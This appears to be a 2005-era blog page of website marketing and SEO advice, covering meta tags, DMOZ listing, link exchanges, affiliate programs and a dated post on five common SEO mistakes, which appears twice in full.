Huge Mistake #4: Having a "Graphics-Based" Website -- Sure, graphics can certainly help us to visualize a particular situation or circumstance, product or service... But did you know that having a graphically-driven website can actually DISTRACT your visitor away from your sales message?

After all, your sales message (or "web copy") is THE #1 most important factor in a website that makes money. If your visitors are paying more attention to your "professional graphics" than your sales message... you've just lost another sale.

Here's why: You've got approximately seven seconds from the time your visitor arrives at your site, to the time they decide whether to buy your product, get more information or LEAVE. If you've got a graphically-intensive website, your website will most likely still be loading past your seven-second time limit.

That's a "customer-killer" in and of itself - however, the real reason lies within the fact that the bigger, brighter and more beautiful your graphics are, the more they will distract your visitor from your sales message. And if your visitor is distracted even for one second, it could mean the difference between getting a sale, and losing a customer.

Huge Mistake #5: Designing a Website with ZERO Marketing Experience -- Most web designers have no idea how to make money on the internet, with anything other than their design services. It's not their fault - they simply have no or very little marketing and sales experience. After all, they're just website designers...

However, having your website designed by someone with ZERO internet marketing experience is like buying a street-car without an engine... it won't go anywhere, and it'll just waste your time and money!

Part I : Getting Free Hits Using These Simple Tips & Tricks

Search Engine Optimization

Search engines still remain the #1 tool to generate free targeted traffic to any website, so make sure that your site is indexed in every major search engine. Do a through check of all the meta tags and make sure you are not missing any one. The most important meta tag is the "Title" tag which should be kept short and sweet. Then there comes the "Description" and the "Keywords" tags, please make sure that you are not dumping keywords on this tag which do not belong to your website. e.g. don't include keywords for selling perfumes when you are selling books. Make sure that the description and the keywords are relevant to your website. Another major things that no one would tell you is that you MUST have the keywords and description embedded on your site to get a high rank in search engine. What I mean by this is, if you keywords include "Candy, Gum, Lollypop" etc.. and description is "We sell all types of chocolates and candy here" etc. them you MUST have the same words somewhere in your webpage. This is how the search engines check the relevancy of the meta tags. These are just 3 of the major meta tags which should be there on every page. With the ever growing search engine popularity and the way they categorize they searches there are some other meta tags which should be used to describe the site, like "Language", "Robots" , "Revisit" etc. To get details on these tags click this link.

Please make a note that you need to get your website listed on, DMOZ which is a largest human edited directory and which has links with all the major search engines. Listing on DMOZ is free and it can bring highly targeted traffic to your website as well as improve your ranking on other search engines. visit http://www.dmoz.org

** NEVER use refresh or redirect scripts on your index pages as most of the search engines will exclude those pages.

Link Exchange

This is undoubtedly the second major free targeted traffic source. Now, not many webmasters know that having hundreds of link on their website linking to other UN-Related websites will do more harm than good to them. First rule of thumb, NEVER have lots of out-bound link on your index page and secondly exchange links with only those website which have similar content or sell complementary products. Search engines are very smart and can easily know from your meta tags if the site you are linking to has similar content or not. Don't try to fool the search engine or you will end up a fool yourself. I know that exchanging links is not simple and take time, but is the best time investment you will ever do. Having quality site linking to you would mean a better rank to your website. Another important think to note is that it would be better if you exchange text links rather then graphics as this would be more search engine friendly. Also keep changing your text link description from time to time so that you can have fresh and different keywords fed to searches.

So, now the questing is how do you find similar website... very easy. Do a search on google or DMOZ directory and you will get a list of websites. The contact the webmaster individually of every website and ask them for a link exchange.

I also found this website very useful in finding similar content websites. http://www.linkexchange.com

Affiliate Program

Have you ever paid to have your banners displayed 10,000 times and end up paying 10 cents a lick and not getting any sale out of it? This is what happens to most of us when start advertising for our website and products. We think that even if out of those 1000 people who would visit, even if 5% buy something then we have made a profit! but how often does this happen? Close to never. Why pay per click when you can start your own affiliate program and pay commission per sale. Yes right! you don't pay your affiliates till the time someone actually buys anything from your website. This way you get all the clicks you want and if no one buys anything, they you also don't loose anything. You can promote your affiliate program to other webmasters through discussion boards or emails, think about it, you can have tons of webmasters linking to your products and you don't spend a dime until you get paid! Sounds great!

Wednesday, May 18, 2005

The 5 Most Common SEO Mistakes

Having been in the business of optimizing web sites for high search engine rankings for over five years now, I have come across a number of “optimized” sites that use search engine optimization (SEO) techniques that are just plain WRONG.

Most of these sites were optimized by persons just starting out; SEO beginners not yet familiar enough with the industry to determine SEO fact from SEO fiction. But what’s scary is that some of the sites I’ve seen using incorrect methods have been optimised by so called search engine optimization “experts” who really should know better.

Some common themes develop amongst incorrectly optimized sites. Could YOU be making the same errors with your site? To find out, let’s look at the five most common search engine optimization mistakes: 

1) Non Utilization of the Title Tag

How many times have you looked at a web site where the browser title reads “Welcome to [company name]’s web site” or simply “[Company Name]”? Nothing wrong with that, I hear you say? Well if you want to achieve high search engine rankings, there’s PLENTY wrong with it. 

You see, while it may not be common knowledge amongst web designers, most search engines index the content of title tags and consider it to be one of the most important factors in their relevancy algorithm. What you place in your title can make or break your ranking for particular search terms on the various engines. If you don’t include your most important search phrases within your title tag, you are overlooking a vital opportunity in your quest for higher search rankings.

Having said this, you should try and keep your title tag to a maximum of 200 characters, as that is the average limit most search engines will truncate to. If you really insist on including your company name in your title and you’re willing to sacrifice good keyword real estate to do so, put it at the very end of the tag, because search engines give more relevancy “weight” to content at the start of your tag.


2) Use of Untargeted Keywords and Phrases

Another common mistake made by webmasters and SEO learners is their choice of keywords placed in the META keyword tag. Sure it might seem logical to target the word “printers” if you run a printer repair business in Ohio, but think about it – even if you succeeded in ranking well for such a competitive term (you won’t), how many of the people visiting your site as a result of this search would leave as soon as they saw your home page? That’s right, most of them. All the people who wanted to buy printers, all the people looking for businesses outside Ohio, all the people not looking specifically for printer repairers. 

Does it become clear now that targeting such a generic word is a waste of time? What you need to do instead is optimize your site for search terms and phrases that are highly targeted to your precise business. Use a tool such as Wordtracker (keyword location software) to find what people are actually typing in to the search engines to find goods and services similar to yours and concentrate on ranking well for those terms. The more qualified your site visitors are, the more likely you are to convert those visitors into paying customers.


3) A Lack of Optimized Body Text

This one is very common. How often do you visit a home page that is made up entirely of graphics? You know the ones – they consist of an enormous Flash file or maybe a large logo or a montage of images, but the thing they have in common is a distinct lack of text. Think they look professional? Think again. No matter what you read or hear, if a site has no text on the home page, it hasn’t been correctly optimized and has little chance of ranking well in the search engines. Now that’s unprofessional in my opinion.

Beginner SEO’s often make the mistake of creating an optimized title tag and META tags and believing their work is done. WRONG. If you want a web site to rank well in the search engines, you need to give them what they want to see – visible content that is optimized just as well as the invisible content. That means adding keyword-filled body text to any page you want ranking high. Why? Because most search engines can’t index images. Some engines don’t even index META tags anymore. So a site with no visible content becomes effectively invisible to a search engine and has almost no chance of appearing in the rankings for logical searches.


Also, search engine algorithms have become smarter and are now checking that sites contain highly relevant content before including them in their index. If you expect to rank well for a particular keyword or phrase, it’s not too much to expect to find that keyword or phrase within your site is it? 


4) Submitting to 1,000 Search Engines

I love this one. I’ve lost count of how many banner ads or web sites I’ve seen boasting “We’ll submit your site to 1,000 search engines!”  I can’t believe the hype is still prevalent that you need to submit a web site to thousands of search engines in order to receive traffic. This is just NOT TRUE.

In fact, studies show that approximately 90% of search traffic still comes from the 10 major U.S. search engines and directories . Companies that advertise submission to thousands of search engines are usually including in that list minor engines or directories that utilize the databases of major engines anyway (so don’t require submission) or a large number of Free For All (FFA) sites. Submitting your site to FFA pages can damage your site’s reputation in the search engines, because they consider FFA sites to be of very low quality and utilizing spamdexing techniques in an attempt to falsely inflate a site’s link popularity. I’ve even seen examples of sites being banned from a search engine for having their pages listed on FFA sites by ill-informed webmasters without the site owner’s knowledge.



If you are targeting specific geographic markets, you might like to submit your site to the most popular regional search engines in those countries, but the fact is that most people worldwide continue to use the U.S. versions of search engines such as Yahoo and AltaVista despite the fact that there are local versions available. The bottom line? Get your site listed on the 10 most popular search engines and directories and you will have the major worldwide traffic sources covered.

5) Resubmitting Too Soon and Too Often

So you’ve optimized your site and submitted it to the most important search engines. But it’s been three weeks and you haven’t received any traffic. Time to resubmit, right? WRONG. Depending on the search engine, they can take up to twelve weeks to include your site in their index. Each search engine and directory work to their own time frame. You need to check their average submission times and be patient.

So when you’re in, what then? You should regularly submit to ensure you’re ranked above your competitors, maybe once a month or once a week, right? WRONG AGAIN. Once you’re in a search engine’s database, there is no need to resubmit your site. It’s pointless actually, because they already know about your site and their robot is scheduled to revisit and reindex all sites in the database on a regular basis. Resubmitting wastes everybody’s time and can actually get your URL permanently banned from a search engine for “spamdexing”.


The only time you need to resubmit your site to a search engine is if your URL changes or if your domain suddenly drops out of their database entirely. NOT if your ranking drops, NOT if your content changes, but if the domain is actually nowhere to be found in the index (this can happen from time to time as the search engines Spring clean their databases). A good SEO will monitor your rankings regularly (monthly is fine) and only resubmit when absolutely necessary.


So those are the five most common SEO mistakes. Any sound familiar? Don’t worry, you’re in good company. Now that you’ve recognised the problem areas and are better equipped with the correct information, you’ll be able to reverse the damage.
Having been in the business of optimizing web sites for high search engine rankings for over five years now, I have come across a number of “optimized” sites that use search engine optimization (SEO) techniques that are just plain WRONG.

Most of these sites were optimized by persons just starting out; SEO beginners not yet familiar enough with the industry to determine SEO fact from SEO fiction. But what’s scary is that some of the sites I’ve seen using incorrect methods have been optimised by so called search engine optimization “experts” who really should know better.

Some common themes develop amongst incorrectly optimized sites. Could YOU be making the same errors with your site? To find out, let’s look at the five most common search engine optimization mistakes: 

1) Non Utilization of the Title Tag

How many times have you looked at a web site where the browser title reads “Welcome to [company name]’s web site” or simply “[Company Name]”? Nothing wrong with that, I hear you say? Well if you want to achieve high search engine rankings, there’s PLENTY wrong with it. 

You see, while it may not be common knowledge amongst web designers, most search engines index the content of title tags and consider it to be one of the most important factors in their relevancy algorithm. What you place in your title can make or break your ranking for particular search terms on the various engines. If you don’t include your most important search phrases within your title tag, you are overlooking a vital opportunity in your quest for higher search rankings.

Having said this, you should try and keep your title tag to a maximum of 200 characters, as that is the average limit most search engines will truncate to. If you really insist on including your company name in your title and you’re willing to sacrifice good keyword real estate to do so, put it at the very end of the tag, because search engines give more relevancy “weight” to content at the start of your tag.


2) Use of Untargeted Keywords and Phrases

Another common mistake made by webmasters and SEO learners is their choice of keywords placed in the META keyword tag. Sure it might seem logical to target the word “printers” if you run a printer repair business in Ohio, but think about it – even if you succeeded in ranking well for such a competitive term (you won’t), how many of the people visiting your site as a result of this search would leave as soon as they saw your home page? That’s right, most of them. All the people who wanted to buy printers, all the people looking for businesses outside Ohio, all the people not looking specifically for printer repairers. 

Does it become clear now that targeting such a generic word is a waste of time? What you need to do instead is optimize your site for search terms and phrases that are highly targeted to your precise business. Use a tool such as Wordtracker (keyword location software) to find what people are actually typing in to the search engines to find goods and services similar to yours and concentrate on ranking well for those terms. The more qualified your site visitors are, the more likely you are to convert those visitors into paying customers.


3) A Lack of Optimized Body Text

This one is very common. How often do you visit a home page that is made up entirely of graphics? You know the ones – they consist of an enormous Flash file or maybe a large logo or a montage of images, but the thing they have in common is a distinct lack of text. Think they look professional? Think again. No matter what you read or hear, if a site has no text on the home page, it hasn’t been correctly optimized and has little chance of ranking well in the search engines. Now that’s unprofessional in my opinion.

Beginner SEO’s often make the mistake of creating an optimized title tag and META tags and believing their work is done. WRONG. If you want a web site to rank well in the search engines, you need to give them what they want to see – visible content that is optimized just as well as the invisible content. That means adding keyword-filled body text to any page you want ranking high. Why? Because most search engines can’t index images. Some engines don’t even index META tags anymore. So a site with no visible content becomes effectively invisible to a search engine and has almost no chance of appearing in the rankings for logical searches.


Also, search engine algorithms have become smarter and are now checking that sites contain highly relevant content before including them in their index. If you expect to rank well for a particular keyword or phrase, it’s not too much to expect to find that keyword or phrase within your site is it? 


4) Submitting to 1,000 Search Engines

I love this one. I’ve lost count of how many banner ads or web sites I’ve seen boasting “We’ll submit your site to 1,000 search engines!”  I can’t believe the hype is still prevalent that you need to submit a web site to thousands of search engines in order to receive traffic. This is just NOT TRUE.

In fact, studies show that approximately 90% of search traffic still comes from the 10 major U.S. search engines and directories . Companies that advertise submission to thousands of search engines are usually including in that list minor engines or directories that utilize the databases of major engines anyway (so don’t require submission) or a large number of Free For All (FFA) sites. Submitting your site to FFA pages can damage your site’s reputation in the search engines, because they consider FFA sites to be of very low quality and utilizing spamdexing techniques in an attempt to falsely inflate a site’s link popularity. I’ve even seen examples of sites being banned from a search engine for having their pages listed on FFA sites by ill-informed webmasters without the site owner’s knowledge.



If you are targeting specific geographic markets, you might like to submit your site to the most popular regional search engines in those countries, but the fact is that most people worldwide continue to use the U.S. versions of search engines such as Yahoo and AltaVista despite the fact that there are local versions available. The bottom line? Get your site listed on the 10 most popular search engines and directories and you will have the major worldwide traffic sources covered.

5) Resubmitting Too Soon and Too Often

So you’ve optimized your site and submitted it to the most important search engines. But it’s been three weeks and you haven’t received any traffic. Time to resubmit, right? WRONG. Depending on the search engine, they can take up to twelve weeks to include your site in their index. Each search engine and directory work to their own time frame. You need to check their average submission times and be patient.

So when you’re in, what then? You should regularly submit to ensure you’re ranked above your competitors, maybe once a month or once a week, right? WRONG AGAIN. Once you’re in a search engine’s database, there is no need to resubmit your site. It’s pointless actually, because they already know about your site and their robot is scheduled to revisit and reindex all sites in the database on a regular basis. Resubmitting wastes everybody’s time and can actually get your URL permanently banned from a search engine for “spamdexing”.


The only time you need to resubmit your site to a search engine is if your URL changes or if your domain suddenly drops out of their database entirely. NOT if your ranking drops, NOT if your content changes, but if the domain is actually nowhere to be found in the index (this can happen from time to time as the search engines Spring clean their databases). A good SEO will monitor your rankings regularly (monthly is fine) and only resubmit when absolutely necessary.


So those are the five most common SEO mistakes. Any sound familiar? Don’t worry, you’re in good company. Now that you’ve recognised the problem areas and are better equipped with the correct information, you’ll be able to reverse the damage.